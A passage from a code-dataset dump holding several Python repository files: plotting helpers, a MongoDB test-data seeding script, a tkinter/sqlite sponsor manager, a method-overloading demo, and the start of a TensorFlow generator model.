"django.db.migrations.AlterField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "19105817052", "text": "import matplotlib.pyplot as plot\nimport pandas as pandas\n\n\n\"\"\"\ndef pandas_plot_single(pandas_dataframe: pandas.DataFrame, y_axs: list, x_axs: list, title: str = \"\") -> plot:\n\nFunction to create a scatter plot for a single pair of columns.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n y_axs (list): list of column names to be used as the y-axis data.\n x_axs (list): list of column names to be used as the x-axis data.\n title (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_single(pandas_dataframe: pandas.DataFrame, y_axs: list, x_axs: list, title: str = \"\") -> plot:\n # Build the scatter plot\n plot.scatter(y_axs, x_axs)\n plot.xlabel(y_axs)\n plot.ylabel(x_axs)\n plot.title(title)\n return plot\n\n\n\"\"\"\ndef pandas_plot_figure(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n\nFunction to create a plot with multiple lines.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n col_names (list): list of column names to be plotted.\n axs_col_name (str): column name to be used as the x-axis data.\n tittle (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_figure(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n x_axs = pandas_dataframe[axs_col_name].tolist()\n \n fig, ax = plot.subplots() # Create a matplotlib figure\n for col_name in col_names:\n ax.plot(x_axs, pandas_dataframe[col_name].tolist(), label=col_name)# Set title and labels\n \n ax.set_xlabel(axs_col_name)\n ax.set_ylabel('score')# Add a legend\n ax.legend(loc='lower center', bbox_to_anchor=(1.25, 0.5), ncol=3)\n ax.set_title(tittle)\n return plot\n \n \n\"\"\"\ndef pandas_plot_scatter(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n\nFunction to create a scatter plot for multiple pairs of columns.\n\nParameters:\n pandas_dataframe (pandas.DataFrame): input data in the form of a Pandas DataFrame.\n col_names (list): list of column names to be plotted.\n axs_col_name (str): column name to be used as the x-axis data.\n tittle (str): title of the plot.\n\nReturns: plot\n\"\"\"\n\ndef pandas_plot_scatter(pandas_dataframe: pandas.DataFrame, col_names: list[str], axs_col_name: str, tittle : str = \"\") -> plot:\n plot.subplots(figsize=(8, 6))\n plot.subplots_adjust(left=0.1)\n plot.title(tittle)\n plot.xlabel(axs_col_name)\n plot.ylabel(\"z-score\")\n \n x_axs = pandas_dataframe[axs_col_name].tolist()\n \n for column in col_names:\n plot.scatter(x_axs, pandas_dataframe[column].tolist(), label=column, s=9)\n \n plot.legend(loc='lower right', fontsize=8)\n\n return plot", "repo_name": "mstrielnikov/score-standardization-spark", "sub_path": "src/visualization/visualize_plot.py", "file_name": "visualize_plot.py", "file_ext": "py", "file_size_in_byte": 2826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "37806608283", "text": "\nfrom schemas.mongo_models.device_models import MongoDevice, GeoJson2DPoint, MongoDeviceDataEntry\nfrom schemas.mongo_models.account_models import MongoCompanyAccount, MongoCompany\nfrom passlib.context import CryptContext\nfrom beanie import init_beanie\nimport motor\nimport asyncio\nimport time\nimport math\nimport os\nimport sys\nimport random\ncwd = os.getcwd()\nsys.path.append(cwd)\n\n\npwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\")\n\n\nasync def main():\n client = motor.motor_asyncio.AsyncIOMotorClient(\n os.environ['mongo_database_url'])\n await init_beanie(database=client['test'] if os.environ['ENV'] == 'DEV' else client['main'], document_models=[MongoCompany, MongoCompanyAccount, MongoDevice])\n print('making')\n # mongo_company = MongoCompany.construct()\n # mongo_company.name = 'test'\n # await mongo_company.save()\n\n # mongo_account = MongoCompanyAccount.construct()\n # mongo_account.email = 'test'\n # mongo_account.password_hash = pwd_context.hash('test')\n # mongo_account.company_id = mongo_company.id\n # await mongo_account.save()\n\n company = await MongoCompany.find_one(MongoCompany.name == 'test')\n # company.labels = {\n # }\n # await company.save()\n\n device: MongoDevice = MongoDevice.construct()\n device.device_id = 10\n device.device_secret = 20\n device.aes_key = b'\\x12!\\xfbLT\\xf6\\xd1YY}\\xc9\\xd4i\\xdb\\xb9\\x92'\n device.data = []\n device.past_day_data = []\n device.past_week_data = []\n device.past_month_data = []\n device.past_year_data = []\n date = int(time.time()) - 24*60*60\n # for i in range(24*2):\n # entry = MongoDeviceDataEntry.construct()\n # entry.time_s = date + i*30*60\n # entry.distance_mm = 50 * math.sin(i*math.pi*2/24-2)\n # device.past_day_data.append(entry)\n device.company_id = company.id\n device.creation_date = int(time.time())\n device.location = GeoJson2DPoint(coordinates=(51.500 + (random.randint(-500, 500) / 10000),\n -0.1743 + (random.randint(-500, 500) / 10000)))\n device.warning_level = 5\n device.warning_level_percentage = 50\n device.installation_comment = ''\n device.comments = ''\n device.pinned = False\n await device.save()\n print(device)\n\n for i in range(20):\n i = i * 10 + 50\n device: MongoDevice = MongoDevice.construct()\n device.device_id = i\n device.device_secret = 30\n device.aes_key = b'\\x12!\\xfbLT\\xf6\\xd1YY}\\xc9\\xd4i\\xdb\\xb9\\x92'\n device.data = []\n device.past_day_data = []\n device.past_week_data = []\n device.past_month_data = []\n device.past_year_data = []\n date = int(time.time()) - 24*60*60\n for i in range(24*2):\n entry = MongoDeviceDataEntry.construct()\n entry.time_s = date + i*30*60\n entry.distance_mm = 50 * math.sin(i*math.pi*2/24)\n device.past_day_data.append(entry)\n device.company_id = company.id\n device.creation_date = int(time.time())\n device.location = GeoJson2DPoint(\n coordinates=(51.498 + (random.randint(-3000, 3000) / 10000),\n -0.1832 + (random.randint(-3000, 3000) / 10000))\n )\n device.warning_level = 5\n device.setup_complete = True\n device.warning_level_percentage = 50\n device.installation_comment = ''\n device.comments = ''\n device.pinned = False\n await device.save()\n print('made')\n\n\nasyncio.run(main())\n", "repo_name": "pikachunerdy/fastapi-demo", "sub_path": "tests/create_data/create_devices.py", "file_name": "create_devices.py", "file_ext": "py", "file_size_in_byte": 3535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": 
[{"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "passlib.context.CryptContext", "line_number": 17, "usage_type": "call"}, {"api_name": "motor.motor_asyncio.AsyncIOMotorClient", "line_number": 21, "usage_type": "call"}, {"api_name": "motor.motor_asyncio", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "beanie.init_beanie", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompanyAccount", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany.find_one", "line_number": 35, "usage_type": "call"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany", "line_number": 35, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany.name", "line_number": 35, "usage_type": "attribute"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 40, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice.construct", "line_number": 40, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.GeoJson2DPoint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 69, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice.construct", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 78, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDeviceDataEntry.construct", "line_number": 80, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDeviceDataEntry", "line_number": 80, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 82, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 82, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.GeoJson2DPoint", "line_number": 86, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 87, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "25662713572", "text": "\"\"\"\r\nsponsor_manager.py\r\nAuthor: Timothy Gist\r\nDatabase Support: Maranda Dodgson\r\n12/13/2023: The Sponsor Manager program is meant to be a utility to allow the club to manage sponsors.\r\nfunctionality includes a login function to restrict access to the information contained herein.\r\nThe main program allows the user to view entries in the database in order to better manage\r\ninteraction with those sponsors. See the 'about' function from the menubar for more detailed\r\ninformation about the specific functions available.\r\nThere is also functionality that allows the user to add new sponsors and then return to the main program.\r\nThis is not intended to be the final version at this time, but rather a working prototype that can\r\nallow for greater functionality in the future.\r\n12/14/2023: Added formatting to the output for cleaner, more readable text.\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport tkinter.messagebox as tkmessagebox\r\nfrom login_module_V3 import *\r\nimport sqlite3\r\nfrom tkinter import ttk\r\nfrom new_sponsor import *\r\n\r\nlogin()\r\n\r\n\r\n# Create base window\r\nroot = tk.Tk()\r\nroot.title('Sponsor Manager')\r\nroot.geometry('700x700')\r\n\r\n\r\ndef group_members():\r\n result = tkmessagebox.showinfo('Team Members',\r\n 'Team Leader: Timothy Gist \\nDatabase Support: Maranda Dodgson', icon=\"info\")\r\n\r\n\r\ndef about():\r\n about_page = tk.Tk()\r\n about_page.title(\"How to\")\r\n about_page.geometry(\"800x800\")\r\n about_page.configure(background='grey')\r\n panel = tk.Text(about_page, height=50, width=100)\r\n f = open(\"about.txt\", \"r\")\r\n\r\n for line in f:\r\n panel.insert('end', line)\r\n\r\n f.close()\r\n\r\n panel.grid(row=0, column=0)\r\n # scrollbar = ttk.Scrollbar(panel, orient='vertical', command=panel.yview)\r\n # scrollbar.grid(row=0, column=1, sticky=tk.NS)\r\n # panel['yscrollcommand'] = scrollbar.set\r\n about_page.mainloop()\r\n\r\n\r\ndef goodbye():\r\n result = tkmessagebox.askquestion('System', 'Are you sure you want to exit?', icon=\"warning\")\r\n if result == 'yes':\r\n root.destroy()\r\n exit()\r\n\r\n\r\nroot_menubar = tk.Menu(root)\r\nroot.config(menu=root_menubar)\r\nfile_menu = tk.Menu(root_menubar, tearoff=False)\r\nfile_menu.add_command(label='Team Members', command=group_members)\r\nfile_menu.add_command(label='About', command=about)\r\nfile_menu.add_command(label=\"Exit\", command=goodbye)\r\nroot_menubar.add_cascade(label=\"File\", menu=file_menu)\r\n# Create frame to hold group member labels\r\nframe = tk.LabelFrame(root, text=\"Group 1 Team Members\", relief=tk.RAISED, padx=12, pady=12)\r\nframe.grid(row=0, column=0, columnspan=5)\r\n\r\n\r\n# Buttons for functionality\r\ndef sponsors():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM sponsors')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', '----------\\n')\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef membership():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM Membership_level')\r\n records = cur.fetchall()\r\n print_records = ''\r\n item_label = ['ID', 'Level', 'Renewal', 'Cost']\r\n for record in records:\r\n count = 0\r\n for item in record:\r\n 
print_records += f'{item_label[count]: >10}: {str(item): <10} \\n'\r\n            count += 1\r\n\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef member_level():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('SELECT Membership_level FROM Membership_level')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        for item in record:\r\n            print_records += str(item) + '\\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef sponsor_names():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('SELECT Sponsor_Name FROM sponsors')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        print_records += f'Sponsor Name: {str(record[0])} \\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef payment_received():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('SELECT Sponsor_Name FROM sponsors WHERE Payment_Received = \"Yes\"')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        for item in record:\r\n            print_records += str(item) + '\\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef payment_not_received():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('SELECT Sponsor_Name FROM sponsors WHERE Payment_Received = \"No\"')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        for item in record:\r\n            print_records += str(item) + '\\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef sponsor_level():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_level \r\n    FROM Sponsors JOIN Membership_level ON Sponsors.Membership_ID = Membership_level.Membership_ID''')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        for item in record:\r\n            print_records += str(item) + '\\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef membership_cost():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_cost \r\n    FROM Sponsors JOIN Membership_level ON Sponsors.Membership_ID = Membership_level.Membership_ID''')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for record in records:\r\n        for item in record:\r\n            print_records += str(item) + '\\n'\r\n        txt_edit.insert('end', f'{print_records} \\n')\r\n        print_records = ''\r\n\r\n    conn.commit()\r\n    conn.close()\r\n\r\n\r\ndef membership_renewal():\r\n    txt_edit.delete(1.0, tk.END)\r\n    conn = sqlite3.connect('db_member.db')\r\n    cur = conn.cursor()\r\n    cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_renewal, Membership_level.Membership_cost \r\n    FROM Sponsors JOIN Membership_level ON Sponsors.Membership_ID = Membership_level.Membership_ID''')\r\n    records = cur.fetchall()\r\n    print_records = ''\r\n    for 
record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef add_sponsor():\r\n new_sponsor()\r\n\r\n\r\n# Create the text box for query output\r\ntxt_edit = tk.Text(root)\r\n# Create the frame to hold the buttons\r\nfrm_buttons = tk.Frame(root, relief=tk.RAISED)\r\n# Create the buttons\r\nbtn1 = tk.Button(frm_buttons, text='Sponsors', command=sponsors)\r\nbtn2 = tk.Button(frm_buttons, text=\"Membership\", command=membership)\r\nbtn3 = tk.Button(frm_buttons, text='Membership Level', command=member_level)\r\nbtn4 = tk.Button(frm_buttons, text='Sponsor Names', command=sponsor_names)\r\nbtn5 = tk.Button(frm_buttons, text='Payment Received', command=payment_received)\r\nbtn6 = tk.Button(frm_buttons, text='Payment Not received', command=payment_not_received)\r\nbtn7 = tk.Button(frm_buttons, text='Sponsor Level', command=sponsor_level, state='disabled')\r\nbtn8 = tk.Button(frm_buttons, text='Membership Cost', command=membership_cost, state='disabled')\r\nbtn9 = tk.Button(frm_buttons, text='Membership Renewal', command=membership_renewal, state='disabled')\r\nbtn10 = tk.Button(frm_buttons, text='Add New Sponsor', command=add_sponsor)\r\n# Place everything in the main window\r\nbtn1.grid(row=1, column=0, padx=5, pady=5)\r\nbtn2.grid(row=2, column=0, padx=5, pady=5)\r\nbtn3.grid(row=3, column=0, padx=5, pady=5)\r\nbtn4.grid(row=4, column=0, padx=5, pady=5)\r\nbtn5.grid(row=5, column=0, padx=5, pady=5)\r\nbtn6.grid(row=6, column=0, padx=5, pady=5)\r\nbtn7.grid(row=7, column=0, padx=5, pady=5)\r\nbtn8.grid(row=8, column=0, padx=5, pady=5)\r\nbtn9.grid(row=9, column=0, padx=5, pady=5)\r\nbtn10.grid(row=10, column=0, padx=5, pady=5)\r\n\r\nfrm_buttons.grid(row=1, column=0, sticky=\"ns\")\r\ntxt_edit.grid(row=1, column=1, sticky=\"nsew\")\r\n\r\nroot.mainloop()\r\n", "repo_name": "AtlasIdol/SDEV220-Final-Project", "sub_path": "sponsor_manager.py", "file_name": "sponsor_manager.py", "file_ext": "py", "file_size_in_byte": 9127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.Tk", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askquestion", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 58, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 66, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 96, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 118, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 134, 
"usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 135, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 150, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 168, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 184, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 185, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 202, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 203, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 220, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 221, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 242, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 244, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 246, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 247, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 249, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 250, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 255, "usage_type": "call"}]}
+{"seq_id": "32232500648", "text": "import math\nfrom multipledispatch import dispatch\n@dispatch(int)\ndef sum(a):\n print(\"Square root value: \")\n print(a**2)\n@dispatch(int,int,int,int)\ndef sum(a,b,c,d):\n print(\"Addition of 4 numbers: \")\n print(a+b+c+d)\n@dispatch(int,int,int)\ndef sum(a,b,c):\n print(\"Multiplication of 3 values: \")\n print(a*b*c)\n@dispatch(int,int)\ndef sum(p,q):\n t=p*q\n print(\"root value\")\n print(t)\n if t<0:\n print(\"Not possible\")\n else:\n r=math.isqrt(t)\n print(\"root of\")\n print(r)\n if r**2==t:\n print(\"This is perfect square\")\n else:\n print(\"This is not a perfect square\")\nsum(7)\nsum(4,3,9,0)\nsum(2,6,3)\nsum(3,3)\n\n\n\n\n\n", "repo_name": "Meghna131995/VSCode_RobotFramework_MeghnaSuresh", "sub_path": "methodOverloading.py", "file_name": "methodOverloading.py", "file_ext": "py", "file_size_in_byte": 696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multipledispatch.dispatch", "line_number": 3, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 7, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 11, "usage_type": "call"}, {"api_name": "math.isqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "36467596222", "text": "from __future__ import division\n\nimport os\nimport math\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom ops import *\nfrom datasets import *\n\n\nclass GenNet(object):\n def __init__(self, sess, config):\n self.sess = sess\n self.batch_size = config.batch_size\n self.image_size = config.image_size\n\n self.g_lr = config.g_lr\n self.beta1 = config.beta1\n self.delta = config.delta\n self.sigma = config.sigma\n self.sample_steps = config.sample_steps\n self.z_dim = config.z_dim\n\n self.num_epochs = config.num_epochs\n self.data_path = os.path.join(config.data_path, config.category)\n self.log_step = config.log_step\n self.output_dir = os.path.join(config.output_dir, config.category)\n\n self.log_dir = os.path.join(self.output_dir, 'log')\n self.sample_dir = os.path.join(self.output_dir, 'sample')\n self.model_dir = os.path.join(self.output_dir, 'checkpoints')\n\n if tf.gfile.Exists(self.log_dir):\n tf.gfile.DeleteRecursively(self.log_dir)\n tf.gfile.MakeDirs(self.log_dir)\n if not os.path.exists(self.model_dir):\n os.makedirs(self.model_dir)\n if not os.path.exists(self.sample_dir):\n os.makedirs(self.sample_dir)\n\n self.z = tf.placeholder(shape=[None, self.z_dim], dtype=tf.float32, name=\"latent\") \n self.real_image = tf.placeholder(\n shape=[None, self.image_size, self.image_size, 3], dtype=tf.float32, name=\"real\")\n\n self.build_model()\n\n def generator(self, inputs, reuse=False, is_training=True):\n ####################################################\n # Define the structure of generator, you may use the\n # generator structure of DCGAN. ops.py defines some\n # layers that you may use.\n ####################################################\n def batch_norm(input, epsilon=1e-5, momentum=0.9, train=True, name=\"batch_norm\"):\n return tf.contrib.layers.batch_norm(input, decay=momentum,\n updates_collections=None, epsilon=epsilon,\n scale=True, is_training=is_training, scope=name)\n\n with tf.variable_scope('gen', reuse=reuse):\n h1r = tf.expand_dims(tf.expand_dims(inputs, 1), 1)\n\n h2 = tf.layers.conv2d_transpose(h1r, 3*128, [4, 4], strides=(2, 2), padding='valid', name='g_cv2')\n h2r = leaky_relu(batch_norm(h2, train=is_training, name='g_bn2'))\n\n h3 = tf.layers.conv2d_transpose(h2r, 3*64, [5, 5], strides=(2, 2), padding='same', name='g_cv3')\n h3r = leaky_relu(batch_norm(h3, train=is_training, name='g_bn3'))\n\n h4 = tf.layers.conv2d_transpose(h3r, 3*32, [5, 5], strides=(2, 2), padding='same', name='g_cv4')\n h4r = leaky_relu(batch_norm(h4, train=is_training, name='g_bn4'))\n\n h5 = tf.layers.conv2d_transpose(h4r, 3*16, [5, 5], strides=(2, 2), padding='same', name='g_cv5')\n h5r = leaky_relu(batch_norm(h5, train=is_training, name='g_bn5'))\n\n h6 = tf.layers.conv2d_transpose(h5r, 3, [5, 5], strides=(2, 2), padding='same', name='g_cv6')\n\n return tf.nn.tanh(h6)\n\n\n def langevin_dynamics(self, z, Y):\n ####################################################\n # Define Langevin dynamics sampling operation.\n # To define multiple sampling steps, you may use\n # tf.while_loop to define a loop on computation graph.\n # The return should be the updated z.\n ####################################################\n def step(z, Y, i):\n sigma = self.sigma\n delta = self.delta\n fz = self.generator(z, reuse=True)\n grad = tf.gradients(0.5/(sigma**2)*tf.norm(Y - fz, ord=2, axis=0), z, name='grad_z')[0]\n energy = - grad - z\n noise = tf.random_normal(shape=tf.shape(z), name='noise')\n z = z + delta*noise + 
